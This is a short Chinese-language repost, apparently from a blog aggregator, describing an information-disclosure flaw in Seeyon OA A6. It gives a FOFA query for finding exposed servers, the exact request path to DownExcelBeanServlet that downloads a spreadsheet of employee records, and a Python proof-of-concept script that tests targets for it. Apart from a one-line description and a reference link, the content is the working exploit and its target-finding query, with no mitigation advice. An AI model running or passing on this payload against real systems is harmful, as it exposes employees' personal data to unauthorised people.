致远OA A6 员工敏感信息泄露
生活随笔
收集整理的這篇文章主要介紹了
致远OA A6 员工敏感信息泄露
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
致遠OA A6 員工敏感信息泄露
1.漏洞描述
seeyon OA A6版本存在敏感信息泄露漏洞,攻擊者可構造payload,獲取敏感信息。
2.復現過程
fofa:app=“致遠A6”
payload:/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
瀏覽器訪問https://IP:PORT/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
獲取到員工信息excel表。
3.POC
import requeststarget = "http://IP:PORT" url = target + "/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0" res = requests.get(url, verify=False) if res.status_code == 200 and b"[Content_Types].xml" in res.content and b"Excel.Sheet" in res.content:print("success") else:print("no vulnerability")4.refer
https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md
總結
以上是生活随笔為你收集整理的致远OA A6 员工敏感信息泄露的全部內容,希望文章能夠幫你解決所遇到的問題。